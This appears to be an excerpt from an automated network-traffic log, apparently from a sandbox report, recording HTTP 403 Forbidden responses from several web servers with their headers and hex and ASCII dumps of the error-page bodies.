                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 05 Jul 2023 06:07:05 GMTContent-Type: text/htmlContent-Length: 559Connection: keep-aliveServer: IdeaWebServer/5.2.0Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 33 3c 2f 74 69 74 6c 65 3e 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 69 64 65 61 2f 73 74 61 74 69 63 2f 73 74 79 6c 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 2d 74 65 78 74 22 3e 3c 68 31 3e 45 72 72 6f 72 3c 2f 68 31 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 2d 74 65 78 74 2d 73 74 72 6f 6e 67 22 3e 3c 68 31 3e 34 30 33 3c 2f 68 31 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 2d 74 65 78 74 22 3e 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 2d 64 65 73 63 72 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 64 6f 63 75 6d 65 6e 74 2e 3c 2f 70 3e 3c 2f 64 69 76 3e 20 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>Error 403</title><link href="/idea/static/style.css" rel="stylesheet"></head><body><div class="error-container"><div class="error-text"><h1>Error</h1></div><div class="error-text-strong"><h1>403</h1></div><div class="error-text"><h1>Forbidden</h1></div></div><div class="error-descr-container"><p>You don't have permission to access this document.</p></div> </body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 05 Jul 2023 06:07:03 GMTServer: ApacheContent-Length: 318Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p><p>Additionally, a 403 Forbiddenerror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 05 Jul 2023 06:07:05 GMTContent-Type: text/htmlContent-Length: 548Connection: keep-aliveServer: nginxVary: Accept-EncodingData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 05 Jul 2023 06:07:05 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, Keep-AliveLast-Modified: Thu, 12 Aug 2021 07:53:38 GMTAccept-Ranges: bytesContent-Length: 15513Vary: Accept-Encoding,User-AgentKeep-Alive: timeout=5, max=100Content-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 20 20 20 20 3c 21 2d 2d 20 50 6c 61 63 65 20 66 61 76 69 63 6f 6e 2e 69 63 6f 20 61 6e 64 20 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 2e 70 6e 67 20 69 6e 20 74 68 65 20 72 6f 6f 74 20 64 69 72 65 63 74 6f 72 79 20 2d 2d 3e 0a 20 20 20 20 20 20 20 20 3c 21 2d 2d 62 61 73 65 20 63 73 73 20 73 74 79 6c 65 73 2d 2d 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 20 20 20 2e 70 69 63 6e 6f 74 65 20 7b 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 30 70 78 3b 20 20 63 6f 6c 6f 72 3a 20 62 6c 61 63 6b 3b 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 35 30 30 3b 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 31 3b 20 7d 0a 09 09 20 20 20 2e 61 72 72 6f 77 20 7b 20 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 34 65 6d 3b 20 70 61 64 64 69 6e 67 2d 74 6f 70 3a 20 30 70 78 3b 20 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 20 34 65 6d 3b 7d 0a 20 20 20 20 20 20 20 2e 6c 6f 67 69 6e 2d 70 61 67 65 20 2e 6c 6f 67 69 6e 2d 77 72 61 70 70 65 72 20 66 6f 72 6d 20 7b 20 77 69 64 74 68 3a 20 37 39 30 70 78 3b 20 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 20 70 61 64 64 69 6e 67 3a 20 31 30 70 78 20 32 30 70 78 20 32 30 70 78 20 32 30 70 78 3b 20 6d 61 72 67 69 6e 3a 20 30 20 61 75 74 6f 3b 7d 0a 20 0a 20 20 20 20 20 20 20 2e 68 65 61 64 65 72 74 65 78 74 20 7b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 32 30 70 78 20 7d 0a 09 09 20 20 20 2e 73 74 61 74 65 69 63 6f 6e 20 7b 20
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Wed, 05 Jul 2023 06:07:06 GMTContent-Type: text/htmlContent-Length: 548Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 05 Jul 2023 06:07:06 GMTServer: Apache/2.2.24 (Unix) mod_ssl/2.2.24 OpenSSL/1.0.0-fips mod_uploader/3.2.0Content-Length: 202Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 2f 0a 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access /on this server.</p></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 05 Jul 2023 06:07:06 GMTContent-Type: text/plain; charset=UTF-8Content-Length: 16Connection: keep-aliveX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=RYBj%2BmCRWKX39QJuwRgrhjFOFVpE7jK9KyL98MFKPo7pcEFiGPwkw5hjrSraSpdpr1h793h4Trtxx9fppYsjNpRz5CY0dPTv0nSkTrGfNfOhdZsk358Hlv7onEA%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7e1d6d00894b2c39-FRAalt-svc: h3=":443"; ma=86400Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 32 30 Data Ascii: error code: 1020
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 05 Jul 2023 06:07:06 GMTServer: Apache/2.4Content-Length: 318Keep-Alive: timeout=5, max=300Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p><p>Additionally, a 403 Forbiddenerror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: Sucuri/CloudproxyDate: Wed, 05 Jul 2023 06:07:06 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveX-Sucuri-ID: 15003X-XSS-Protection: 1; mode=blockX-Frame-Options: SAMEORIGINX-Content-Type-Options: nosniffX-Sucuri-Block: FBP006Data Raw: 33 30 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 73 75 63 75 72 69 2e 6e 65 74 2f 73 75 63 75 72 69 2d 66 69 72 65 77 61 6c 6c 2d 62 6c 6f 63 6b 2e 63 73 73 22 20 2f 3e 0a 3c 73 65 63 74 69 6f 6e 20 63 6c 61 73 73 3d 22 63 65 6e 74 65 72 20 63 6c 65 61 72 66 69 78 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 53 75 63 75 72 69 20 57 65 62 53 69 74 65 20 46 69 72 65 77 61 6c 6c 20 2d 20 41 63 63 65 73 73 20 44 65 6e 69 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 34 30 30 2c 33 30 30 2c 36 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 6d 61 69 6e 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 3c 68 65 61 64 65 72 20 63 6c 61 73 73 3d 22 61 70 70 2d 68 65 61 64 65 72 20 63 6c 65 61 72 66 69 78 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 72 61 70 22 3e 0a 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 73 75 63 75 72 69 2e 6e 65 74 2f 3f 75 74 6d 5f 73 6f 75 72 63 65 3d 66 69 72 65 77 61 6c 6c 5f 62 6c 6f 63 6b 22 20 63 6c 61 73 73 3d 22 6c 6f 67 6f 22 3e 3c 2f 61 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 6c 6f 67 6f 2d 6e 65 61 72 74 65 78 74 22 3e 57 65 62 73 69 74 65 20 46 69 72 65 77 61 6c 6c 3c 2f 73 70 61 6e 3e 0a 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 75 63 75 72 69 2e 6e 65 74 2f 3f 75 74 6d 5f 73 6f 75 72 63 65 3d 66 69 72 65 77 61 6c 6c 5f 62 6c 6f 63 6b 22 20 63 6c 61 73 73 3d 22 73 69 74 65 2d 6c 69 6e 6b 22 3e 42 61 63 6b 20 74 6f 20 73 75 63 75 72 69 2e 6e 65 74 3c 2f 61 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 68 65 61 64 65 72 3e 0a 0a 0d 0a 34 63 62 0d 0a 3c 73 65 63 74 69 6f 6e 20 63 6c 61 73 73 3d 22 61 70 70 2d 63 6f 6e 74 65 6e 74 20 61 63 63 65 73 73 2d 64 65 6e 69 65 64 20 63 6c 65 61 72 66 69 78 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 6f 78 20 63 65 6e 74 65 72 20 77 69 64 74 68 2d 6d 61 78 2d 39 34 30 22 3e 3c 68 31 20 63 6c 61 73 73 3d 22 62 72 61 6e 64 2d 6
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenAge: 0Cache-Control: no-cacheContent-Length: 77561Content-Type: text/html; charset=UTF-8Date: Wed, 05 Jul 2023 06:07:06 UTCExpires: Thu, 01 Jan 1970 00:00:00 UTCPragma: no-cacheServer: SquarespaceSet-Cookie: crumb=BXemQcB9hNR8NTYzNDg2MTlmNTg3ZTE3OTliMmFkY2VhYzlkNTVh;Path=/X-Contextid: Jmet36x5/SF1bMkrFData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 77 68 69 74 65 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 74 6f 70 3a 20 35 30 25 3b 0a 20 20 20 20 6c 65 66 74 3a 20 35 30 25 3b 0a 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 28 2d 35 30 25 2c 20 2d 35 30 25 29 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6d 69 6e 2d 77 69 64 74 68 3a 20 39 35 76 77 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 68 31 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 34 2e 36 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 31 39 31 39 31 39 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 30 20 31 31 70 78 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 2e 34 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 65 6d 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 61 20 7b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 73 6f 6c 69 64 20 31 70 78 20 23 33 61 33 61 33 61 3b 0a 20 20 7d 0a 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 43 6c 61 72 6b 73 6f 6e 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 20 20 7d 0a 0a 20 20 23 73 74 61 74 75 73 2d 70 61 67 65 20 7b 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 0a 20 20 7d 0a 0a 20 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 62 6f 74 74 6f 6d 3a 20 32 32 70 78 3b 0a 20 20 20 20 6c 65 66 74 3a 20 30 3b 0a 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65
